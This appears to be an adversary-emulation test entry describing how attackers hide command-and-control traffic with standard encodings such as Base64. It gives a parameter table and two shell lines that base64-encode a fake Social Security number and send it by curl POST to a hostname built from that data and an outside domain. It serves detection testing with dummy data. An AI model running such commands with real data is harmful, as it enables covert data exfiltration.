Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.
Utilizing a common technique for posting base64 encoded data.
Supported Platforms: macOS, Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| destination_url | Destination URL to post encoded data. | string | redcanary.com |
| base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE= |
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}